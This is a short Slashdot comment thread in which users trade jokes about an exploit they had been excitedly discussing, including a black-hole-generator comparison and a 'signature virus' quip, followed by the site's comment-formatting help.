
That's how IT saved the world. (2, Funny)

Thanshin (1188877) | more than 4 years ago | (#29565603)

Can you imagine the same people in other fields of science?

"...Hey guys, look! I made the black hole generator we were theorizing yesterday! See? I just have to press this button and

Re:That's how IT saved the world. (3, Funny)

Idiomatick (976696) | more than 4 years ago | (#29565781)

This is why the engineer engineers make fun of us in software engineering. :(

Re:That's how IT saved the world. (3, Funny)

dotancohen (1015143) | more than 4 years ago | (#29565945)

Can you imagine the same people in other fields of science?

"...Hey guys, look! I made the black hole generator we were theorizing yesterday! See? I just have to press this button and

They keep having problems with that black hole generator, just wait until November. [slashdot.org]

if you read the posts backwards (1)

nimbius (983462) | more than 4 years ago | (#29565709)

its a bunch of overly-excited people talking about an exploit until it goes away.

Re:if you read the posts backwards (2, Funny)

Neoncow (802085) | more than 4 years ago | (#29566391)

It actually works the same way if you read it forwards.

Oh cool! Now I can... (1)

argent (18001) | more than 4 years ago | (#29566403)

Oh cool, now I can finally create the signature virus!

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>